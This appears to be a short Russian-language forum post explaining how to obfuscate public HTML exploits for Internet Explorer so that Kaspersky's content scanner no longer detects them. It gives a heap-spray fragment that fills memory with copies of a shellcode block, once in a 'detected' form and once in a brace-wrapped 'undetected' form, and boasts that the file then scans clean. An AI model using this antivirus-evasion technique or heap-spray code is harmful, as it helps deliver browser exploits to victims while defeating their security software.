|
Обфускация html public-эксплоитов для IE (проверял на касперыче)
Для того чтоб наибсти анализатор контента, например касперычевский (тестил онлайн версию), делаем простой экспанд блочных функций (обычно циклы):
оригинал эксплоита (палится): ... while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<350;i++) memory[i] = block + shellcode; ... модификация (нипалица): ... while (bigblock.length<slackspace){bigblock+=bigblock;} fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000){block = block+block+fillblock;} memory = new Array(); for (i=0;i<350;i++){memory[i] = block + shellcode;} ... + тестим... + файл чист ;) |
| Время: 17:22 |